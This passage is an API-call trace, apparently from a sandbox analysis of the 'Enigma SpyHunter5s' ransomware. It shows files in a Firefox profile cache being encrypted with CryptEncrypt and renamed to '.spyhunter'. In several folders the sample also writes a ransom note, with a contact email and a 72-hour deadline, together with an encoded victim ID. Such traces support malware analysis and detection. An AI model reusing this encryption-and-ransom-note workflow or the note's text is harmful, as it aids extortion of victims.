lpMem=0x2fbd1a8 | out: hHeap=0x2c0000) returned 1 [0155.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.286] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.286] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb37*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec60, lpOverlapped=0x0 | out: lpBuffer=0x270eb37*, lpNumberOfBytesWritten=0x270ec60*=0x127, lpOverlapped=0x0) returned 1 [0155.286] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.286] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec60, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec60*=0x2ac, lpOverlapped=0x0) returned 1 [0155.287] CloseHandle (hObject=0xa0) returned 1 [0155.287] GetProcessHeap () returned 0x2c0000 [0155.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1f58 | out: hHeap=0x2c0000) returned 1 [0155.287] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec00 | out: pbBuffer=0x270ec00) returned 1 [0155.287] GetProcessHeap () returned 0x2c0000 [0155.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.287] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebf8*=0x30) returned 1 [0155.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.288] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0155.288] StrStrW (lpFirst="16A09d01", lpSrch=".txt") returned 0x0 [0155.288] GetProcessHeap () returned 0x2c0000 [0155.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0155.288] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ebbc*=0x2800, lpOverlapped=0x0) returned 1 [0155.289] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.289] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ebbc*=0x2800, lpOverlapped=0x0) returned 1 [0155.289] GetProcessHeap () returned 0x2c0000 [0155.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0155.289] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.290] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebbc, lpOverlapped=0x0 | out: lpBuffer=0x270ebfc*, lpNumberOfBytesWritten=0x270ebbc*=0x4, lpOverlapped=0x0) returned 1 [0155.290] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebbc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebbc*=0x30, lpOverlapped=0x0) returned 1 [0155.290] CloseHandle (hObject=0xa0) returned 1 [0155.290] GetProcessHeap () returned 0x2c0000 [0155.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.291] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.spyhunter") returned 119 [0155.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01.spyhunter")) returned 1 [0155.291] GetProcessHeap () returned 0x2c0000 [0155.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.292] GetProcessHeap () returned 0x2c0000 [0155.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.292] GetProcessHeap () returned 0x2c0000 [0155.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbce30 | out: hHeap=0x2c0000) returned 1 [0155.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\8\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.292] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.292] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb2f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec58, lpOverlapped=0x0 | out: lpBuffer=0x270eb2f*, lpNumberOfBytesWritten=0x270ec58*=0x127, lpOverlapped=0x0) returned 1 [0155.293] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.293] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec58*=0x2ac, lpOverlapped=0x0) returned 1 [0155.293] CloseHandle (hObject=0xa0) returned 1 [0155.293] GetProcessHeap () returned 0x2c0000 [0155.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1e20 | out: hHeap=0x2c0000) returned 1 [0155.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\7\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.294] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.294] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x270eb2b*, lpNumberOfBytesWritten=0x270ec54*=0x127, lpOverlapped=0x0) returned 1 [0155.295] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.295] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec54*=0x2ac, lpOverlapped=0x0) returned 1 [0155.295] CloseHandle (hObject=0xa0) returned 1 [0155.295] GetProcessHeap () returned 0x2c0000 [0155.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1ce8 | out: hHeap=0x2c0000) returned 1 [0155.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\6\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.296] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.296] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb27*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec50, lpOverlapped=0x0 | out: lpBuffer=0x270eb27*, lpNumberOfBytesWritten=0x270ec50*=0x127, lpOverlapped=0x0) returned 1 [0155.297] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.297] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec50*=0x2ac, lpOverlapped=0x0) returned 1 [0155.297] CloseHandle (hObject=0xa0) returned 1 [0155.297] GetProcessHeap () returned 0x2c0000 [0155.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1bb0 | out: hHeap=0x2c0000) returned 1 [0155.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\5\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.298] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.298] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x270eb23*, lpNumberOfBytesWritten=0x270ec4c*=0x127, lpOverlapped=0x0) returned 1 [0155.299] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.299] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec4c*=0x2ac, lpOverlapped=0x0) returned 1 [0155.299] CloseHandle (hObject=0xa0) returned 1 [0155.299] GetProcessHeap () returned 0x2c0000 [0155.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48ba0 | out: hHeap=0x2c0000) returned 1 [0155.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\4\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.300] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.300] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec48, lpOverlapped=0x0 | out: lpBuffer=0x270eb1f*, lpNumberOfBytesWritten=0x270ec48*=0x127, lpOverlapped=0x0) returned 1 [0155.301] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.301] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec48*=0x2ac, lpOverlapped=0x0) returned 1 [0155.301] CloseHandle (hObject=0xa0) returned 1 [0155.301] GetProcessHeap () returned 0x2c0000 [0155.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48a68 | out: hHeap=0x2c0000) returned 1 [0155.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.302] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.302] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x270eb1b*, lpNumberOfBytesWritten=0x270ec44*=0x127, lpOverlapped=0x0) returned 1 [0155.303] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.303] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec44*=0x2ac, lpOverlapped=0x0) returned 1 [0155.303] CloseHandle (hObject=0xa0) returned 1 [0155.303] GetProcessHeap () returned 0x2c0000 [0155.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48930 | out: hHeap=0x2c0000) returned 1 [0155.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.304] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.304] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb17*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec40, lpOverlapped=0x0 | out: lpBuffer=0x270eb17*, lpNumberOfBytesWritten=0x270ec40*=0x127, lpOverlapped=0x0) returned 1 [0155.305] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.305] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec40, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec40*=0x2ac, 